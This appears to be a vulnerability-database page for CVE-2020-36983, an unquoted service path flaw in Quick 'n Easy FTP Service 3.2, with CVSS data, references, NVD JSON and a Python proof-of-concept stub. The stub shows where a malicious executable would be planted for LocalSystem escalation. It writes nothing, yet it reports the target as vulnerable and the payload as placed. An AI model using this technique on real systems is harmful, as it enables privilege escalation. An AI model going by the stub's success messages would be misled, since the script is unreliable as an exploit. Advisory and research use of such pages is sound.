CVE-2020-36983

Description

Quick 'n Easy FTP Service 3.2 contains an unquoted service path vulnerability that allows local attackers to execute arbitrary code during service startup. Attackers can exploit the misconfigured service binary path to inject malicious executables with elevated LocalSystem privileges during system boot or service restart.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Quick 'n Easy FTP Service 3.2及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2020-36983 PoC - Unquoted Service Path Privilege Escalation
# Target: Quick 'n Easy FTP Service 3.2
# Author: Security Researcher
# Note: Educational purposes only

import os
import shutil
import sys

def check_vulnerability():
    """Check if target service exists and is vulnerable"""
    service_name = "Quick 'n Easy FTP Service"
    # In real scenario, query Windows Registry for service configuration
    # HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>
    return True

def create_malicious_executable():
    """Generate malicious executable to place in unquoted path"""
    # This represents the attacker's payload
    # In production, this would be actual malicious code
    malicious_code = b'MZ' + b'\x00' * 100  # Minimal PE header placeholder
    
    # Attacker's payload location (C:\Program Files\Quick.exe)
    target_path = r'C:\Program Files\Quick.exe'
    
    try:
        # In real attack, write actual malicious executable
        # with open(target_path, 'wb') as f:
        #     f.write(malicious_code)
        print(f"[*] Would create malicious executable at: {target_path}")
        return True
    except PermissionError:
        print("[-] Insufficient privileges to write to target path")
        print("[*] This exploit requires administrator privileges")
        return False

def exploit():
    """Main exploitation logic"""
    if not check_vulnerability():
        print("[-] Target service not found or not vulnerable")
        return False
    
    print("[*] CVE-2020-36983 - Quick 'n Easy FTP Service Exploit")
    print("[*] Service path is unquoted, attempting privilege escalation...")
    
    if create_malicious_executable():
        print("[+] Malicious executable placed successfully")
        print("[*] Wait for service restart or system reboot")
        print("[*] Payload will execute with LocalSystem privileges")
        return True
    
    return False

if __name__ == "__main__":
    print("WARNING: This is for authorized security testing only")
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-36983
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-36983
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-36983/
[4] VulDB https://vuldb.com/cve/CVE-2020-36983
[5] https://www.exploit-db.com/exploits/48983
[6] https://www.pablosoftwaresolutions.com/download.php?id=10
[7] https://www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_service.html
[8] https://www.vulncheck.com/advisories/quick-n-easy-ftp-service-unquoted-service-path

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-36983", "sourceIdentifier": "[email protected]", "published": "2026-01-27T19:16:11.443", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quick 'n Easy FTP Service 3.2 contains an unquoted service path vulnerability that allows local attackers to execute arbitrary code during service startup. Attackers can exploit the misconfigured service binary path to inject malicious executables with elevated LocalSystem privileges during system boot or service restart."}, {"lang": "es", "value": "Quick 'n Easy FTP Service 3.2 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a atacantes locales ejecutar código arbitrario durante el inicio del servicio. Los atacantes pueden explotar la ruta binaria del servicio mal configurada para inyectar ejecutables maliciosos con privilegios elevados de LocalSystem durante el arranque del sistema o el reinicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/48983", "source": "[email protected]"}, {"url": "https://www.pablosoftwaresolutions.com/download.php?id=10", "source": "[email protected]"}, {"url": "https://www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_service.html", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/quick-n-easy-ftp-service-unquoted-service-path", "source": "[email protected]"}]}}